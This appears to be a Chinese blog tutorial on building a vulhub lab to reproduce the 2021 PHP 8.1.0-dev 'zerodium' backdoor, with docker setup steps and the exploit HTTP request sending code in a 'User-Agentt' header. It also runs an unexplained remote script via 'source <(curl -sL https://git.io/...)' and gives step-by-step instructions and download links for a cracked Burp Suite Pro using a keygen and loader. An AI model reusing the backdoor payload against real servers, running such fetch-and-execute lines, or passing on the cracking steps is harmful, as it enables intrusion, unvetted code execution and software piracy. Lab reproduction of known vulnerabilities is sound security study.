vulhub复现环境搭建

vulhub复现环境搭建

1
2
漏洞环境:
https://vulhub.org/#/environments/

以复现 <>为例

PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。

参考:https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

QQ群:397745473

主机环境

购买VPS主机:https://www.vultr.com/?ref=8391117-6G

执行命令一键搭建桌面环境:

1
source <(curl -sL https://git.io/Jqfs7)

安装docker环境

直接执行以下命令即可

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
apt-get update
【安装docker】
apt install -y docker.io
apt-get install python3-pip
pip3 install docker-compose
service docker start

【接取docker】
git clone https://github.com/vulhub/vulhub.git
cd vulhub/php/8.1-backdoor
# 启动整个环境
docker-compose up -d

访问测试页面:
http://127.0.0.1:8080/

【进入docker】
docker exec -i -t 0c5d95fcb39e /bin/bash

Burp Suite Pro安装

上传burp.zip到vps中

1
2
3
4
5
6
7
安装java环境:
apt install default-jre
java -Xmx2g -jar burpsuite_pro_v2020.2.1.jar


java -jar burp-loader-keygen-2020_2_1.jar
java -jar burpsuite_pro_v2020.2.1.jar

我使用的方法

1
2
3
4
5
6
7
8
9
1. 先到官网下载最新版程序并安装
https://portswigger.net/burp/releases
从这里安装的软件自带有一个配套的jre

2. 到52下载破解版程序
https://down.52pojie.cn/Tools/Network_Analyzer/

3. 启动命令
~/BurpSuitePro/jre/bin/java -Xmx1G -XX:-UseParallelGC -noverify -javaagent:BurpSuiteLoader.jar -Dfile.encoding=utf-8 -jar ~/BurpSuitePro/burpsuite_pro.jar

其他方法参考

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
burp破解版打开方法参考:https://www.ddosi.com/b429/

Burp Suite Pro 2020.9.2破解方法[正确打开方式]:

和上一篇gif演示相同:自行查看该连接中的gif
https://www.ddosi.com/wp-content/uploads/2020/09/burpsuite_2020.9.gif

如果运行以后无法正常运行burp,可以试试运行 **java -jar burploader-old.jar**

### 对于windows用户

直接运行0.bat即可
[①确保java版本为9-14之间]
[②确保环境变量已设置]
[③确保无多余java版本存在]

#### 0.bat中的内容:


java –illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2020.9.2.jar -noverify -jar burpsuite_pro_v2020.9.2.jar

1
2
3
4
5
6
7
8

#### 环境变量未设置的windows用户:

可在cmd中运行如下命令:
[①把 **C:\Program Files\Java\jdk-13.0.2\bin\java.exe** 改为你的java版本以及所在目录]
[②cd到java所在目录]


“C:\Program Files\Java\jdk-13.0.2\bin\java.exe” –illegal-access=permit -Dfile.encoding=utf-8 -javaagent:BurpSuiteLoader_v2020.9.2.jar -noverify -jar burpsuite_pro_v2020.9.2.jar

1
2
3
4

### 对于Linux用户


java -Xmx8G -XX:-UseParallelGC -noverify -javaagent:BurpSuiteLoader.jar -Dfile.encoding=utf-8 -jar burpsuite_pro_v2020.2.1.jar

1
2
3
4
5
6
7
8
9
10
11

## **burpsuite_pro_v2020.9.**2下载地址

①雨苁网盘: [w.ddosi.workers.dev/](https://w.ddosi.workers.dev/雨苁网站分享/burp/burpsuite_pro_v2020.9.2/)
②迅雷网盘: [pan.xunlei.com/s/VMIyZn5Zp30iTdhdxtz8-wr8A1](https://pan.xunlei.com/s/VMIyZn5Zp30iTdhdxtz8-wr8A1)
提取码:ozK0
解压密码 www.ddosi.com

## 官网Burp Suite Pro 2020.9.2.jar SHA256和MD5校验值:

不放心的(谨慎者)可以自行到官网进行校验

漏洞复现

发送如下数据包,可见代码var_dump(233*233);成功执行:

1
2
3
4
5
6
7
8
GET / HTTP/1.1
Host: localhost:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
User-Agentt: zerodiumvar_dump(233*233);
Connection: close

删除环境

1
2
# 删除整个环境
docker-compose down

QQ群:397745473

知识星球